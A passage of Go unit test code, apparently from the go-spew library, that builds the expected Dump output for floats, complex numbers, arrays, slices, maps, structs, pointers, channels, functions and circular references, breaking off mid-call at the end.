addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Boolean false. + v2 := bool(false) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "bool" + v2s := "false" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") +} + +func addFloatDumpTests() { + // Standard float32. + v := float32(3.1415) + nv := (*float32)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "float32" + vs := "3.1415" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Standard float64. + v2 := float64(3.1415926) + nv2 := (*float64)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "float64" + v2s := "3.1415926" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv2, "(*"+v2t+")()\n") +} + +func addComplexDumpTests() { + // Standard complex64. + v := complex(float32(6), -2) + nv := (*complex64)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "complex64" + vs := "(6-2i)" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Standard complex128. + v2 := complex(float64(-6), 2) + nv2 := (*complex128)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "complex128" + v2s := "(-6+2i)" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv2, "(*"+v2t+")()\n") +} + +func addArrayDumpTests() { + // Array containing standard ints. + v := [3]int{1, 2, 3} + vLen := fmt.Sprintf("%d", len(v)) + vCap := fmt.Sprintf("%d", cap(v)) + nv := (*[3]int)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "int" + vs := "(len=" + vLen + " cap=" + vCap + ") {\n (" + vt + ") 1,\n (" + + vt + ") 2,\n (" + vt + ") 3\n}" + addDumpTest(v, "([3]"+vt+") "+vs+"\n") + addDumpTest(pv, "(*[3]"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**[3]"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*[3]"+vt+")()\n") + + // Array containing type with custom formatter on pointer receiver only. + v2i0 := pstringer("1") + v2i1 := pstringer("2") + v2i2 := pstringer("3") + v2 := [3]pstringer{v2i0, v2i1, v2i2} + v2i0Len := fmt.Sprintf("%d", len(v2i0)) + v2i1Len := fmt.Sprintf("%d", len(v2i1)) + v2i2Len := fmt.Sprintf("%d", len(v2i2)) + v2Len := fmt.Sprintf("%d", len(v2)) + v2Cap := fmt.Sprintf("%d", cap(v2)) + nv2 := (*[3]pstringer)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "spew_test.pstringer" + v2sp := "(len=" + v2Len + " cap=" + v2Cap + ") {\n (" + v2t + + ") (len=" + v2i0Len + ") stringer 1,\n (" + v2t + + ") (len=" + v2i1Len + ") stringer 2,\n (" + v2t + + ") (len=" + v2i2Len + ") " + "stringer 3\n}" + v2s := v2sp + if spew.UnsafeDisabled { + v2s = "(len=" + v2Len + " cap=" + v2Cap + ") {\n (" + v2t + + ") (len=" + v2i0Len + ") \"1\",\n (" + v2t + ") (len=" + + v2i1Len + ") \"2\",\n (" + v2t + ") (len=" + v2i2Len + + ") " + "\"3\"\n}" + } + addDumpTest(v2, "([3]"+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*[3]"+v2t+")("+v2Addr+")("+v2sp+")\n") + addDumpTest(&pv2, "(**[3]"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2sp+")\n") + addDumpTest(nv2, "(*[3]"+v2t+")()\n") + + // Array containing interfaces. + v3i0 := "one" + v3 := [3]interface{}{v3i0, int(2), uint(3)} + v3i0Len := fmt.Sprintf("%d", len(v3i0)) + v3Len := fmt.Sprintf("%d", len(v3)) + v3Cap := fmt.Sprintf("%d", cap(v3)) + nv3 := (*[3]interface{})(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "[3]interface {}" + v3t2 := "string" + v3t3 := "int" + v3t4 := "uint" + v3s := "(len=" + v3Len + " cap=" + v3Cap + ") {\n (" + v3t2 + ") " + + "(len=" + v3i0Len + ") \"one\",\n (" + v3t3 + ") 2,\n (" + + v3t4 + ") 3\n}" + addDumpTest(v3, "("+v3t+") "+v3s+"\n") + addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n") + addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n") + addDumpTest(nv3, "(*"+v3t+")()\n") + + // Array containing bytes. + v4 := [34]byte{ + 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, + 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, + 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, + 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, + 0x31, 0x32, + } + v4Len := fmt.Sprintf("%d", len(v4)) + v4Cap := fmt.Sprintf("%d", cap(v4)) + nv4 := (*[34]byte)(nil) + pv4 := &v4 + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "[34]uint8" + v4s := "(len=" + v4Len + " cap=" + v4Cap + ") " + + "{\n 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20" + + " |............... |\n" + + " 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30" + + " |!\"#$%&'()*+,-./0|\n" + + " 00000020 31 32 " + + " |12|\n}" + addDumpTest(v4, "("+v4t+") "+v4s+"\n") + addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n") + addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n") + addDumpTest(nv4, "(*"+v4t+")()\n") +} + +func addSliceDumpTests() { + // Slice containing standard float32 values. + v := []float32{3.14, 6.28, 12.56} + vLen := fmt.Sprintf("%d", len(v)) + vCap := fmt.Sprintf("%d", cap(v)) + nv := (*[]float32)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "float32" + vs := "(len=" + vLen + " cap=" + vCap + ") {\n (" + vt + ") 3.14,\n (" + + vt + ") 6.28,\n (" + vt + ") 12.56\n}" + addDumpTest(v, "([]"+vt+") "+vs+"\n") + addDumpTest(pv, "(*[]"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**[]"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*[]"+vt+")()\n") + + // Slice containing type with custom formatter on pointer receiver only. + v2i0 := pstringer("1") + v2i1 := pstringer("2") + v2i2 := pstringer("3") + v2 := []pstringer{v2i0, v2i1, v2i2} + v2i0Len := fmt.Sprintf("%d", len(v2i0)) + v2i1Len := fmt.Sprintf("%d", len(v2i1)) + v2i2Len := fmt.Sprintf("%d", len(v2i2)) + v2Len := fmt.Sprintf("%d", len(v2)) + v2Cap := fmt.Sprintf("%d", cap(v2)) + nv2 := (*[]pstringer)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "spew_test.pstringer" + v2s := "(len=" + v2Len + " cap=" + v2Cap + ") {\n (" + v2t + ") (len=" + + v2i0Len + ") stringer 1,\n (" + v2t + ") (len=" + v2i1Len + + ") stringer 2,\n (" + v2t + ") (len=" + v2i2Len + ") " + + "stringer 3\n}" + addDumpTest(v2, "([]"+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*[]"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**[]"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv2, "(*[]"+v2t+")()\n") + + // Slice containing interfaces. + v3i0 := "one" + v3 := []interface{}{v3i0, int(2), uint(3), nil} + v3i0Len := fmt.Sprintf("%d", len(v3i0)) + v3Len := fmt.Sprintf("%d", len(v3)) + v3Cap := fmt.Sprintf("%d", cap(v3)) + nv3 := (*[]interface{})(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "[]interface {}" + v3t2 := "string" + v3t3 := "int" + v3t4 := "uint" + v3t5 := "interface {}" + v3s := "(len=" + v3Len + " cap=" + v3Cap + ") {\n (" + v3t2 + ") " + + "(len=" + v3i0Len + ") \"one\",\n (" + v3t3 + ") 2,\n (" + + v3t4 + ") 3,\n (" + v3t5 + ") \n}" + addDumpTest(v3, "("+v3t+") "+v3s+"\n") + addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n") + addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n") + addDumpTest(nv3, "(*"+v3t+")()\n") + + // Slice containing bytes. + v4 := []byte{ + 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, + 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, + 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, + 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, + 0x31, 0x32, + } + v4Len := fmt.Sprintf("%d", len(v4)) + v4Cap := fmt.Sprintf("%d", cap(v4)) + nv4 := (*[]byte)(nil) + pv4 := &v4 + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "[]uint8" + v4s := "(len=" + v4Len + " cap=" + v4Cap + ") " + + "{\n 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20" + + " |............... |\n" + + " 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30" + + " |!\"#$%&'()*+,-./0|\n" + + " 00000020 31 32 " + + " |12|\n}" + addDumpTest(v4, "("+v4t+") "+v4s+"\n") + addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n") + addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n") + addDumpTest(nv4, "(*"+v4t+")()\n") + + // Nil slice. + v5 := []int(nil) + nv5 := (*[]int)(nil) + pv5 := &v5 + v5Addr := fmt.Sprintf("%p", pv5) + pv5Addr := fmt.Sprintf("%p", &pv5) + v5t := "[]int" + v5s := "" + addDumpTest(v5, "("+v5t+") "+v5s+"\n") + addDumpTest(pv5, "(*"+v5t+")("+v5Addr+")("+v5s+")\n") + addDumpTest(&pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")("+v5s+")\n") + addDumpTest(nv5, "(*"+v5t+")()\n") +} + +func addStringDumpTests() { + // Standard string. + v := "test" + vLen := fmt.Sprintf("%d", len(v)) + nv := (*string)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "string" + vs := "(len=" + vLen + ") \"test\"" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") +} + +func addInterfaceDumpTests() { + // Nil interface. + var v interface{} + nv := (*interface{})(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "interface {}" + vs := "" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Sub-interface. + v2 := interface{}(uint16(65535)) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "uint16" + v2s := "65535" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") +} + +func addMapDumpTests() { + // Map with string keys and int vals. + k := "one" + kk := "two" + m := map[string]int{k: 1, kk: 2} + klen := fmt.Sprintf("%d", len(k)) // not kLen to shut golint up + kkLen := fmt.Sprintf("%d", len(kk)) + mLen := fmt.Sprintf("%d", len(m)) + nilMap := map[string]int(nil) + nm := (*map[string]int)(nil) + pm := &m + mAddr := fmt.Sprintf("%p", pm) + pmAddr := fmt.Sprintf("%p", &pm) + mt := "map[string]int" + mt1 := "string" + mt2 := "int" + ms := "(len=" + mLen + ") {\n (" + mt1 + ") (len=" + klen + ") " + + "\"one\": (" + mt2 + ") 1,\n (" + mt1 + ") (len=" + kkLen + + ") \"two\": (" + mt2 + ") 2\n}" + ms2 := "(len=" + mLen + ") {\n (" + mt1 + ") (len=" + kkLen + ") " + + "\"two\": (" + mt2 + ") 2,\n (" + mt1 + ") (len=" + klen + + ") \"one\": (" + mt2 + ") 1\n}" + addDumpTest(m, "("+mt+") "+ms+"\n", "("+mt+") "+ms2+"\n") + addDumpTest(pm, "(*"+mt+")("+mAddr+")("+ms+")\n", + "(*"+mt+")("+mAddr+")("+ms2+")\n") + addDumpTest(&pm, "(**"+mt+")("+pmAddr+"->"+mAddr+")("+ms+")\n", + "(**"+mt+")("+pmAddr+"->"+mAddr+")("+ms2+")\n") + addDumpTest(nm, "(*"+mt+")()\n") + addDumpTest(nilMap, "("+mt+") \n") + + // Map with custom formatter type on pointer receiver only keys and vals. + k2 := pstringer("one") + v2 := pstringer("1") + m2 := map[pstringer]pstringer{k2: v2} + k2Len := fmt.Sprintf("%d", len(k2)) + v2Len := fmt.Sprintf("%d", len(v2)) + m2Len := fmt.Sprintf("%d", len(m2)) + nilMap2 := map[pstringer]pstringer(nil) + nm2 := (*map[pstringer]pstringer)(nil) + pm2 := &m2 + m2Addr := fmt.Sprintf("%p", pm2) + pm2Addr := fmt.Sprintf("%p", &pm2) + m2t := "map[spew_test.pstringer]spew_test.pstringer" + m2t1 := "spew_test.pstringer" + m2t2 := "spew_test.pstringer" + m2s := "(len=" + m2Len + ") {\n (" + m2t1 + ") (len=" + k2Len + ") " + + "stringer one: (" + m2t2 + ") (len=" + v2Len + ") stringer 1\n}" + if spew.UnsafeDisabled { + m2s = "(len=" + m2Len + ") {\n (" + m2t1 + ") (len=" + k2Len + + ") " + "\"one\": (" + m2t2 + ") (len=" + v2Len + + ") \"1\"\n}" + } + addDumpTest(m2, "("+m2t+") "+m2s+"\n") + addDumpTest(pm2, "(*"+m2t+")("+m2Addr+")("+m2s+")\n") + addDumpTest(&pm2, "(**"+m2t+")("+pm2Addr+"->"+m2Addr+")("+m2s+")\n") + addDumpTest(nm2, "(*"+m2t+")()\n") + addDumpTest(nilMap2, "("+m2t+") \n") + + // Map with interface keys and values. + k3 := "one" + k3Len := fmt.Sprintf("%d", len(k3)) + m3 := map[interface{}]interface{}{k3: 1} + m3Len := fmt.Sprintf("%d", len(m3)) + nilMap3 := map[interface{}]interface{}(nil) + nm3 := (*map[interface{}]interface{})(nil) + pm3 := &m3 + m3Addr := fmt.Sprintf("%p", pm3) + pm3Addr := fmt.Sprintf("%p", &pm3) + m3t := "map[interface {}]interface {}" + m3t1 := "string" + m3t2 := "int" + m3s := "(len=" + m3Len + ") {\n (" + m3t1 + ") (len=" + k3Len + ") " + + "\"one\": (" + m3t2 + ") 1\n}" + addDumpTest(m3, "("+m3t+") "+m3s+"\n") + addDumpTest(pm3, "(*"+m3t+")("+m3Addr+")("+m3s+")\n") + addDumpTest(&pm3, "(**"+m3t+")("+pm3Addr+"->"+m3Addr+")("+m3s+")\n") + addDumpTest(nm3, "(*"+m3t+")()\n") + addDumpTest(nilMap3, "("+m3t+") \n") + + // Map with nil interface value. + k4 := "nil" + k4Len := fmt.Sprintf("%d", len(k4)) + m4 := map[string]interface{}{k4: nil} + m4Len := fmt.Sprintf("%d", len(m4)) + nilMap4 := map[string]interface{}(nil) + nm4 := (*map[string]interface{})(nil) + pm4 := &m4 + m4Addr := fmt.Sprintf("%p", pm4) + pm4Addr := fmt.Sprintf("%p", &pm4) + m4t := "map[string]interface {}" + m4t1 := "string" + m4t2 := "interface {}" + m4s := "(len=" + m4Len + ") {\n (" + m4t1 + ") (len=" + k4Len + ")" + + " \"nil\": (" + m4t2 + ") \n}" + addDumpTest(m4, "("+m4t+") "+m4s+"\n") + addDumpTest(pm4, "(*"+m4t+")("+m4Addr+")("+m4s+")\n") + addDumpTest(&pm4, "(**"+m4t+")("+pm4Addr+"->"+m4Addr+")("+m4s+")\n") + addDumpTest(nm4, "(*"+m4t+")()\n") + addDumpTest(nilMap4, "("+m4t+") \n") +} + +func addStructDumpTests() { + // Struct with primitives. + type s1 struct { + a int8 + b uint8 + } + v := s1{127, 255} + nv := (*s1)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "spew_test.s1" + vt2 := "int8" + vt3 := "uint8" + vs := "{\n a: (" + vt2 + ") 127,\n b: (" + vt3 + ") 255\n}" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Struct that contains another struct. + type s2 struct { + s1 s1 + b bool + } + v2 := s2{s1{127, 255}, true} + nv2 := (*s2)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "spew_test.s2" + v2t2 := "spew_test.s1" + v2t3 := "int8" + v2t4 := "uint8" + v2t5 := "bool" + v2s := "{\n s1: (" + v2t2 + ") {\n a: (" + v2t3 + ") 127,\n b: (" + + v2t4 + ") 255\n },\n b: (" + v2t5 + ") true\n}" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv2, "(*"+v2t+")()\n") + + // Struct that contains custom type with Stringer pointer interface via both + // exported and unexported fields. + type s3 struct { + s pstringer + S pstringer + } + v3 := s3{"test", "test2"} + nv3 := (*s3)(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "spew_test.s3" + v3t2 := "spew_test.pstringer" + v3s := "{\n s: (" + v3t2 + ") (len=4) stringer test,\n S: (" + v3t2 + + ") (len=5) stringer test2\n}" + v3sp := v3s + if spew.UnsafeDisabled { + v3s = "{\n s: (" + v3t2 + ") (len=4) \"test\",\n S: (" + + v3t2 + ") (len=5) \"test2\"\n}" + v3sp = "{\n s: (" + v3t2 + ") (len=4) \"test\",\n S: (" + + v3t2 + ") (len=5) stringer test2\n}" + } + addDumpTest(v3, "("+v3t+") "+v3s+"\n") + addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3sp+")\n") + addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3sp+")\n") + addDumpTest(nv3, "(*"+v3t+")()\n") + + // Struct that contains embedded struct and field to same struct. + e := embed{"embedstr"} + eLen := fmt.Sprintf("%d", len("embedstr")) + v4 := embedwrap{embed: &e, e: &e} + nv4 := (*embedwrap)(nil) + pv4 := &v4 + eAddr := fmt.Sprintf("%p", &e) + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "spew_test.embedwrap" + v4t2 := "spew_test.embed" + v4t3 := "string" + v4s := "{\n embed: (*" + v4t2 + ")(" + eAddr + ")({\n a: (" + v4t3 + + ") (len=" + eLen + ") \"embedstr\"\n }),\n e: (*" + v4t2 + + ")(" + eAddr + ")({\n a: (" + v4t3 + ") (len=" + eLen + ")" + + " \"embedstr\"\n })\n}" + addDumpTest(v4, "("+v4t+") "+v4s+"\n") + addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n") + addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n") + addDumpTest(nv4, "(*"+v4t+")()\n") +} + +func addUintptrDumpTests() { + // Null pointer. + v := uintptr(0) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "uintptr" + vs := "" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + + // Address of real variable. + i := 1 + v2 := uintptr(unsafe.Pointer(&i)) + nv2 := (*uintptr)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "uintptr" + v2s := fmt.Sprintf("%p", &i) + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv2, "(*"+v2t+")()\n") +} + +func addUnsafePointerDumpTests() { + // Null pointer. + v := unsafe.Pointer(uintptr(0)) + nv := (*unsafe.Pointer)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "unsafe.Pointer" + vs := "" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Address of real variable. + i := 1 + v2 := unsafe.Pointer(&i) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "unsafe.Pointer" + v2s := fmt.Sprintf("%p", &i) + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv, "(*"+vt+")()\n") +} + +func addChanDumpTests() { + // Nil channel. + var v chan int + pv := &v + nv := (*chan int)(nil) + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "chan int" + vs := "" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Real channel. + v2 := make(chan int) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "chan int" + v2s := fmt.Sprintf("%p", v2) + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") +} + +func addFuncDumpTests() { + // Function with no params and no returns. + v := addIntDumpTests + nv := (*func())(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "func()" + vs := fmt.Sprintf("%p", v) + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Function with param and no returns. + v2 := TestDump + nv2 := (*func(*testing.T))(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "func(*testing.T)" + v2s := fmt.Sprintf("%p", v2) + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv2, "(*"+v2t+")()\n") + + // Function with multiple params and multiple returns. + var v3 = func(i int, s string) (b bool, err error) { + return true, nil + } + nv3 := (*func(int, string) (bool, error))(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "func(int, string) (bool, error)" + v3s := fmt.Sprintf("%p", v3) + addDumpTest(v3, "("+v3t+") "+v3s+"\n") + addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n") + addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n") + addDumpTest(nv3, "(*"+v3t+")()\n") +} + +func addCircularDumpTests() { + // Struct that is circular through self referencing. + type circular struct { + c *circular + } + v := circular{nil} + v.c = &v + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "spew_test.circular" + vs := "{\n c: (*" + vt + ")(" + vAddr + ")({\n c: (*" + vt + ")(" + + vAddr + ")()\n })\n}" + vs2 := "{\n c: (*" + vt + ")(" + vAddr + ")()\n}" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs2+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs2+")\n") + + // Structs that are circular through cross referencing. + v2 := xref1{nil} + ts2 := xref2{&v2} + v2.ps2 = &ts2 + pv2 := &v2 + ts2Addr := fmt.Sprintf("%p", &ts2) + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "spew_test.xref1" + v2t2 := "spew_test.xref2" + v2s := "{\n ps2: (*" + v2t2 + ")(" + ts2Addr + ")({\n ps1: (*" + v2t + + ")(" + v2Addr + ")({\n ps2: (*" + v2t2 + ")(" + ts2Addr + + ")()\n })\n })\n}" + v2s2 := "{\n ps2: (*" + v2t2 + ")(" + ts2Addr + ")({\n ps1: (*" + v2t + + ")(" + v2Addr + ")()\n })\n}" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s2+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s2+")\n") + + // Structs that are indirectly circular. + v3 := indirCir1{nil} + tic2 := indirCir2{nil} + tic3 := indirCir3{&v3} + tic2.ps3 = &tic3 + v3.ps2 = &tic2 + pv3 := &v3 + tic2Addr := fmt.Sprintf("%p", &tic2) + tic3Addr := fmt.Sprintf("%p", &tic3) + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "spew_test.indirCir1" + v3t2 := "spew_test.indirCir2" + v3t3 := "spew_test.indirCir3" + v3s := "{\n ps2: (*" + v3t2 + ")(" + tic2Addr + ")({\n ps3: (*" + v3t3 + + ")(" + tic3Addr + ")({\n ps1: (*" + v3t + ")(" + v3Addr + + ")({\n ps2: (*" + v3t2 + ")(" + tic2Addr + + ")()\n })\n })\n })\n}" + v3s2 := "{\n ps2: (*" + v3t2 + ")(" + tic2Addr + ")({\n ps3: (*" + v3t3 + + ")(" + tic3Addr + ")({\n ps1: (*" + v3t + ")(" + v3Addr + + ")()\n })\n })\n}" + addDumpTest(v3, "("+v3t+") "+v3s+"\n") + addDumpTest(pv3, 